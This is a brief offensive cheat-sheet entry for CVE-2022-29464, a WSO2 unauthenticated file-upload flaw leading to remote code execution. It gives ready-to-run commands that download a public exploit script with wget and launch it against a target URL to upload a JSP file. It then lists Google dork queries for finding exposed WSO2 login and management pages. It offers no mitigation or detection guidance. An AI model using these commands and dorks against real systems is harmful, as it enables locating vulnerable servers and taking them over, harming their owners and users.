WSO2 RCE (CVE-2022-29464)
Critical vulnerability on WSO2 discovered by Orange Tsai. the vulnerability is an unauthenticated unrestricted arbitrary file upload which which allows unauthenticated attackers to gain RCE on WSO2 servers via uploading malicious JSP files.
https://github.com/hakivvi/CVE-2022-29464
wget <https://raw.githubusercontent.com/hakivvi/CVE-2022-29464/main/exploit.py> -O wso2.py;
python3 wso2.py <https://wso2.company.com> clg.jsp
Google Dorks:
inurl:"/carbon/admin/login.jsp"
inurl:"/authenticationendpoint/login.do"
inurl:"devportal/apis"
intitle:"API Publisher- Login"
intitle:"WSO2 Management Console"